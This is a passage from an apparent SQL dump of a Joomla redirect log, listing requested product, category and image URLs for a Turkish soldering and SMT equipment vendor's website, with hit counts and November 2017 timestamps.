00:00:00',301),(11923,'http://3s-technologies.com.tr/en/products/rh2-20-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-15 14:24:08','0000-00-00 00:00:00',301),(11924,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer',NULL,'','',1,0,'2017-11-15 14:33:48','0000-00-00 00:00:00',301),(11925,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/results,1-100',NULL,'','',15,0,'2017-11-15 15:16:48','0000-00-00 00:00:00',301),(11926,'http://3s-technologies.com.tr/en/products/rh2-detail?tmpl=component&print=1',NULL,'','',11,0,'2017-11-15 15:44:06','0000-00-00 00:00:00',301),(11927,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/t_ly8c_250x250.jpg',NULL,'','',1,0,'2017-11-15 16:48:18','0000-00-00 00:00:00',301),(11928,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,product_name/dirdesc',NULL,'','',2,0,'2017-11-15 17:00:27','0000-00-00 00:00:00',301),(11929,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',52,0,'2017-11-15 17:59:50','0000-00-00 00:00:00',301),(11930,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae',NULL,'','',4,0,'2017-11-15 18:51:46','0000-00-00 00:00:00',301),(11931,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/results,1-100',NULL,'','',18,0,'2017-11-15 19:02:52','0000-00-00 00:00:00',301),(11932,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name',NULL,'','',47,0,'2017-11-15 19:13:02','0000-00-00 00:00:00',301),(11933,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer',NULL,'','',12,0,'2017-11-15 19:22:51','0000-00-00 00:00:00',301),(11934,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name',NULL,'','',4,0,'2017-11-15 19:25:37','0000-00-00 00:00:00',301),(11935,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,mf_name?language=en-gb',NULL,'','',26,0,'2017-11-15 19:46:09','0000-00-00 00:00:00',301),(11936,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,category_name',NULL,'','',41,0,'2017-11-15 20:04:02','0000-00-00 00:00:00',301),(11937,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,mf_name/results,1-5',NULL,'','',6,0,'2017-11-15 20:24:12','0000-00-00 00:00:00',301),(11938,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/jv131-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-15 20:27:29','0000-00-00 00:00:00',301),(11939,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',4,0,'2017-11-15 20:28:25','0000-00-00 00:00:00',301),(11940,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-15 20:39:33','0000-00-00 00:00:00',301),(11941,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_name?language=en-gb',NULL,'','',25,0,'2017-11-15 20:53:06','0000-00-00 00:00:00',301),(11942,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,mf_name',NULL,'','',13,0,'2017-11-15 21:01:52','0000-00-00 00:00:00',301),(11943,'http://3s-technologies.com.tr/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-15 21:09:15','0000-00-00 00:00:00',301),(11944,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme',NULL,'','',82,0,'2017-11-15 21:10:25','0000-00-00 00:00:00',301),(11945,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/dirdesc',NULL,'','',228,0,'2017-11-15 21:15:22','0000-00-00 00:00:00',301),(11946,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/ddm-novastar',NULL,'','',12,0,'2017-11-15 21:27:14','0000-00-00 00:00:00',301),(11947,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-15 21:36:17','0000-00-00 00:00:00',301),(11948,'http://www.3s-technologies.com.tr/en/products/konveyorler/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-15 21:50:53','0000-00-00 00:00:00',301),(11949,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-15 22:16:34','0000-00-00 00:00:00',301),(11950,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',13,0,'2017-11-15 22:26:26','0000-00-00 00:00:00',301),(11951,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_sb_2_250x250.png',NULL,'','',2,0,'2017-11-15 22:34:40','0000-00-00 00:00:00',301),(11952,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/rhii_640x420_250x250.jpg',NULL,'','',1,0,'2017-11-15 22:38:46','0000-00-00 00:00:00',301),(11953,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-15 23:22:45','0000-00-00 00:00:00',301),(11954,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,ordering',NULL,'','',4,0,'2017-11-15 23:27:01','0000-00-00 00:00:00',301),(11955,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-15 23:29:26','0000-00-00 00:00:00',301),(11956,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering',NULL,'','',5,0,'2017-11-15 23:42:12','0000-00-00 00:00:00',301),(11957,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku',NULL,'','',48,0,'2017-11-16 00:12:31','0000-00-00 00:00:00',301),(11958,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/dirdesc',NULL,'','',36,0,'2017-11-16 00:19:33','0000-00-00 00:00:00',301),(11959,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-5',NULL,'','',10,0,'2017-11-16 00:32:42','0000-00-00 00:00:00',301),(11960,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,ordering',NULL,'','',9,0,'2017-11-16 00:53:02','0000-00-00 00:00:00',301),(11961,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',23,0,'2017-11-16 00:54:13','0000-00-00 00:00:00',301),(11962,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/avf-detail',NULL,'','',51,0,'2017-11-16 00:55:17','0000-00-00 00:00:00',301),(11963,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-10',NULL,'','',4,0,'2017-11-16 01:03:10','0000-00-00 00:00:00',301),(11964,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/le40v_400x214_250x250.jpg',NULL,'','',2,0,'2017-11-16 01:03:35','0000-00-00 00:00:00',301),(11965,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/results,1-5',NULL,'','',6,0,'2017-11-16 01:13:32','0000-00-00 00:00:00',301),(11966,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name/results,1-10',NULL,'','',7,0,'2017-11-16 01:18:32','0000-00-00 00:00:00',301),(11967,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',7,0,'2017-11-16 01:49:11','0000-00-00 00:00:00',301),(11968,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,mf_name/dirdesc',NULL,'','',5,0,'2017-11-16 01:59:30','0000-00-00 00:00:00',301),(11969,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name/results,1-10',NULL,'','',6,0,'2017-11-16 02:09:51','0000-00-00 00:00:00',301),(11970,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name',NULL,'','',54,0,'2017-11-16 02:19:52','0000-00-00 00:00:00',301),(11971,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-10',NULL,'','',4,0,'2017-11-16 02:30:01','0000-00-00 00:00:00',301),(11972,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,category_name/results,1-5',NULL,'','',6,0,'2017-11-16 02:55:31','0000-00-00 00:00:00',301),(11973,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-16 03:00:36','0000-00-00 00:00:00',301),(11974,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-16 03:02:23','0000-00-00 00:00:00',301),(11975,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',7,0,'2017-11-16 03:10:37','0000-00-00 00:00:00',301),(11976,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/results,1-20',NULL,'','',1,0,'2017-11-16 03:25:52','0000-00-00 00:00:00',301),(11977,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,ordering/results,1-10',NULL,'','',4,0,'2017-11-16 03:41:12','0000-00-00 00:00:00',301),(11978,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',570,0,'2017-11-16 04:09:39','0000-00-00 00:00:00',301),(11979,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_name',NULL,'','',38,0,'2017-11-16 04:20:12','0000-00-00 00:00:00',301),(11980,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering',NULL,'','',3,0,'2017-11-16 04:28:23','0000-00-00 00:00:00',301),(11981,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_name',NULL,'','',39,0,'2017-11-16 04:33:05','0000-00-00 00:00:00',301),(11982,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-10',NULL,'','',6,0,'2017-11-16 04:53:54','0000-00-00 00:00:00',301),(11983,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-25_250x250.jpg',NULL,'','',1,0,'2017-11-16 05:17:22','0000-00-00 00:00:00',301),(11984,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan12s-400x268_250x250.jpg',NULL,'','',1,0,'2017-11-16 05:44:01','0000-00-00 00:00:00',301),(11985,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-20_250x250.gif',NULL,'','',1,0,'2017-11-16 05:50:50','0000-00-00 00:00:00',301),(11986,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/mx200_250x250.jpg',NULL,'','',1,0,'2017-11-16 05:57:57','0000-00-00 00:00:00',301),(11987,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hä±zlä±',NULL,'','',1,0,'2017-11-16 06:03:38','0000-00-00 00:00:00',301),(11988,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_1_250x250.jpg',NULL,'','',3,0,'2017-11-16 06:15:19','0000-00-00 00:00:00',301),(11989,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',3,0,'2017-11-16 06:40:43','0000-00-00 00:00:00',301),(11990,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/spr-45va_250x250.gif',NULL,'','',1,0,'2017-11-16 06:40:49','0000-00-00 00:00:00',301),(11991,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/zero-g3_250x250.jpg',NULL,'','',1,0,'2017-11-16 06:41:05','0000-00-00 00:00:00',301),(11992,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/am100-detail',NULL,'','',1,0,'2017-11-16 06:50:53','0000-00-00 00:00:00',301),(11993,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-16 07:07:34','0000-00-00 00:00:00',301),(11994,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/npm_250x250.jpg',NULL,'','',2,0,'2017-11-16 07:11:57','0000-00-00 00:00:00',301),(11995,'http://www.3s-technologies.com.tr/en/products/konveyorler/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-16 07:21:23','0000-00-00 00:00:00',301),(11996,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-16 07:38:20','0000-00-00 00:00:00',301),(11997,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rh6-400x300_250x250.jpg',NULL,'','',3,0,'2017-11-16 07:39:45','0000-00-00 00:00:00',301),(11998,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-40',NULL,'','',4,0,'2017-11-16 07:41:42','0000-00-00 00:00:00',301),(11999,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name',NULL,'','',49,0,'2017-11-16 08:02:12','0000-00-00 00:00:00',301),(12000,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/npm_250x250.jpg',NULL,'','',1,0,'2017-11-16 08:32:50','0000-00-00 00:00:00',301),(12001,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',1,0,'2017-11-16 09:24:40','0000-00-00 00:00:00',301),(12002,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',1,0,'2017-11-16 09:37:17','0000-00-00 00:00:00',301),(12003,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_asp-300_250x250.jpg',NULL,'','',1,0,'2017-11-16 09:55:04','0000-00-00 00:00:00',301),(12004,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/av132_250x250.jpg',NULL,'','',1,0,'2017-11-16 10:13:56','0000-00-00 00:00:00',301),(12005,'http://www.3s-technologies.com.tr/en/products/konveyorler/dirdesc/results,1-50',NULL,'','',10,0,'2017-11-16 10:35:15','0000-00-00 00:00:00',301),(12006,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-10',NULL,'','',12,0,'2017-11-16 10:40:05','0000-00-00 00:00:00',301),(12007,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',27,0,'2017-11-16 10:48:34','0000-00-00 00:00:00',301),(12008,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',14,0,'2017-11-16 11:02:32','0000-00-00 00:00:00',301),(12009,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-16 11:15:34','0000-00-00 00:00:00',301),(12010,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-16 11:23:29','0000-00-00 00:00:00',301),(12011,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,product_name/dirdesc',NULL,'','',6,0,'2017-11-16 11:40:55','0000-00-00 00:00:00',301),(12012,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-40',NULL,'','',8,0,'2017-11-16 11:46:02','0000-00-00 00:00:00',301),(12013,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku?language=en-gb',NULL,'','',25,0,'2017-11-16 12:03:33','0000-00-00 00:00:00',301),(12014,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_mi300_250x250.jpg',NULL,'','',4,0,'2017-11-16 12:10:08','0000-00-00 00:00:00',301),(12015,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,product_sku/results,1-5',NULL,'','',3,0,'2017-11-16 12:11:11','0000-00-00 00:00:00',301),(12016,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/results,1-20',NULL,'','',5,0,'2017-11-16 12:16:12','0000-00-00 00:00:00',301),(12017,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',553,0,'2017-11-16 12:35:32','0000-00-00 00:00:00',301),(12018,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-50',NULL,'','',5,0,'2017-11-16 12:36:20','0000-00-00 00:00:00',301),(12019,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cm602_250x250.png',NULL,'','',1,0,'2017-11-16 12:53:24','0000-00-00 00:00:00',301),(12020,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/dirdesc',NULL,'','',240,0,'2017-11-16 12:53:57','0000-00-00 00:00:00',301),(12021,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-100',NULL,'','',3,0,'2017-11-16 12:56:24','0000-00-00 00:00:00',301),(12022,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',6,0,'2017-11-16 13:01:22','0000-00-00 00:00:00',301),(12023,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-10',NULL,'','',8,0,'2017-11-16 13:16:44','0000-00-00 00:00:00',301),(12024,'http://www.3s-technologies.com.tr/tr/?option=com_registration',NULL,'http://www.3s-technologies.com.tr/tr/?option=com_registration','',1,0,'2017-11-16 13:21:39','0000-00-00 00:00:00',301),(12025,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-20',NULL,'','',1,0,'2017-11-16 13:21:51','0000-00-00 00:00:00',301),(12026,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/955lc-37-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-11-16 13:32:59','0000-00-00 00:00:00',301),(12027,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/sp18_250x250.jpg',NULL,'','',3,0,'2017-11-16 13:37:41','0000-00-00 00:00:00',301),(12028,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-16 14:32:48','0000-00-00 00:00:00',301),(12029,'http://3s-technologies.com.tr/index.php/en/products/955lc-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-16 14:39:35','0000-00-00 00:00:00',301),(12030,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,mf_name/results,1-5',NULL,'','',1,0,'2017-11-16 14:47:42','0000-00-00 00:00:00',301),(12031,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',409,0,'2017-11-16 14:55:35','0000-00-00 00:00:00',301),(12032,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/dirdesc/results,1-10',NULL,'','',5,0,'2017-11-16 15:02:52','0000-00-00 00:00:00',301),(12033,'http://3s-technologies.com.tr/en/products/screen-printer/by,product_sku',NULL,'','',7,0,'2017-11-16 15:43:57','0000-00-00 00:00:00',301),(12034,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-16 15:50:53','0000-00-00 00:00:00',301),(12035,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-16 15:53:22','0000-00-00 00:00:00',301),(12036,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',3,0,'2017-11-16 16:03:31','0000-00-00 00:00:00',301),(12037,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail',NULL,'','',56,0,'2017-11-16 16:14:35','0000-00-00 00:00:00',301),(12038,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail',NULL,'','',60,0,'2017-11-16 16:37:58','0000-00-00 00:00:00',301),(12039,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_sku?language=en-gb',NULL,'','',25,0,'2017-11-16 16:42:33','0000-00-00 00:00:00',301),(12040,'http://3s-technologies.com.tr/tr/images/ddm/reflow ovens/spartan_8s.gif',NULL,'','',7,0,'2017-11-16 17:38:06','0000-00-00 00:00:00',301),(12041,'http://www.3s-technologies.com.tr/tr/component/users?view=register',NULL,'http://www.3s-technologies.com.tr/tr/component/users?view=register','',1,0,'2017-11-16 17:39:16','0000-00-00 00:00:00',301),(12042,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/results,1-5',NULL,'','',3,0,'2017-11-16 17:39:40','0000-00-00 00:00:00',301),(12043,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/rh6-400x300_250x250.jpg',NULL,'','',1,0,'2017-11-16 17:50:21','0000-00-00 00:00:00',301),(12044,'http://www.3s-technologies.com.tr/en/products/rh2-20-detail?tmpl=component&print=1',NULL,'','',31,0,'2017-11-16 18:07:33','0000-00-00 00:00:00',301),(12045,'http://3s-technologies.com.tr/tr/urunler/manufacturer/aqueous',NULL,'','',24,0,'2017-11-16 18:10:07','0000-00-00 00:00:00',301),(12046,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/mirae',NULL,'','',9,0,'2017-11-16 18:25:33','0000-00-00 00:00:00',301),(12047,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-40',NULL,'','',4,0,'2017-11-16 18:45:51','0000-00-00 00:00:00',301),(12048,'http://3s-technologies.com.tr/en/products/smd-fırın',NULL,'','',425,0,'2017-11-16 18:47:39','0000-00-00 00:00:00',301),(12049,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/dirdesc',NULL,'','',2,0,'2017-11-16 18:51:56','0000-00-00 00:00:00',301),(12050,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı',NULL,'','',92,0,'2017-11-16 19:16:30','0000-00-00 00:00:00',301),(12051,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-16 19:32:01','0000-00-00 00:00:00',301),(12052,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux',NULL,'','',49,0,'2017-11-16 19:46:40','0000-00-00 00:00:00',301),(12053,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-16 19:59:37','0000-00-00 00:00:00',301),(12054,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/t_asp-300_250x250.jpg',NULL,'','',1,0,'2017-11-16 20:33:21','0000-00-00 00:00:00',301),(12055,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering',NULL,'','',11,0,'2017-11-16 20:35:53','0000-00-00 00:00:00',301),(12056,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-16 20:45:49','0000-00-00 00:00:00',301),(12057,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',211,0,'2017-11-16 20:46:37','0000-00-00 00:00:00',301),(12058,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',9,0,'2017-11-16 21:01:24','0000-00-00 00:00:00',301),(12059,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer',NULL,'','',41,0,'2017-11-16 21:14:02','0000-00-00 00:00:00',301),(12060,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-16 21:16:44','0000-00-00 00:00:00',301),(12061,'http://www.3s-technologies.com.tr/tr/component/user?view=registration',NULL,'http://www.3s-technologies.com.tr/tr/component/user?view=registration','',1,0,'2017-11-16 21:43:29','0000-00-00 00:00:00',301),(12062,'http://www.3s-technologies.com.tr/tr/component/user?view=register',NULL,'http://www.3s-technologies.com.tr/tr/component/user?view=register','',2,0,'2017-11-16 21:43:31','0000-00-00 00:00:00',301),(12063,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-16 21:53:20','0000-00-00 00:00:00',301),(12064,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-16 22:04:49','0000-00-00 00:00:00',301),(12065,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',30,0,'2017-11-16 22:41:34','0000-00-00 00:00:00',301),(12066,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-16 22:42:41','0000-00-00 00:00:00',301),(12067,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-16 22:47:37','0000-00-00 00:00:00',301),(12068,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-16 22:50:28','0000-00-00 00:00:00',301),(12069,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-detail',NULL,'','',24,0,'2017-11-16 23:04:30','0000-00-00 00:00:00',301),(12070,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-16 23:05:44','0000-00-00 00:00:00',301),(12071,'http://3s-technologies.com.tr/index.php/en/products/955lc-37-detail?tmpl=component&print=1',NULL,'','',16,0,'2017-11-16 23:20:11','0000-00-00 00:00:00',301),(12072,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',18,0,'2017-11-16 23:58:15','0000-00-00 00:00:00',301),(12073,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-17 00:22:57','0000-00-00 00:00:00',301),(12074,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer',NULL,'https://www.google.com/','',29,0,'2017-11-17 00:27:47','0000-00-00 00:00:00',301),(12075,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&product_name',NULL,'','',7,0,'2017-11-17 00:33:18','0000-00-00 00:00:00',301),(12076,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',14,0,'2017-11-17 00:33:22','0000-00-00 00:00:00',301),(12077,'http://3s-technologies.com.tr/index.php/en/products/245-k100-28-29-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-17 00:36:12','0000-00-00 00:00:00',301),(12078,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name',NULL,'','',23,0,'2017-11-17 00:39:45','0000-00-00 00:00:00',301),(12079,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,category_name',NULL,'','',221,0,'2017-11-17 00:42:17','0000-00-00 00:00:00',301),(12080,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',547,0,'2017-11-17 00:44:20','0000-00-00 00:00:00',301),(12081,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim?error=404',NULL,'','',1,0,'2017-11-17 00:55:48','0000-00-00 00:00:00',301),(12082,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-17 01:02:52','0000-00-00 00:00:00',301),(12083,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,mf_name/results,1-10',NULL,'','',1,0,'2017-11-17 01:13:09','0000-00-00 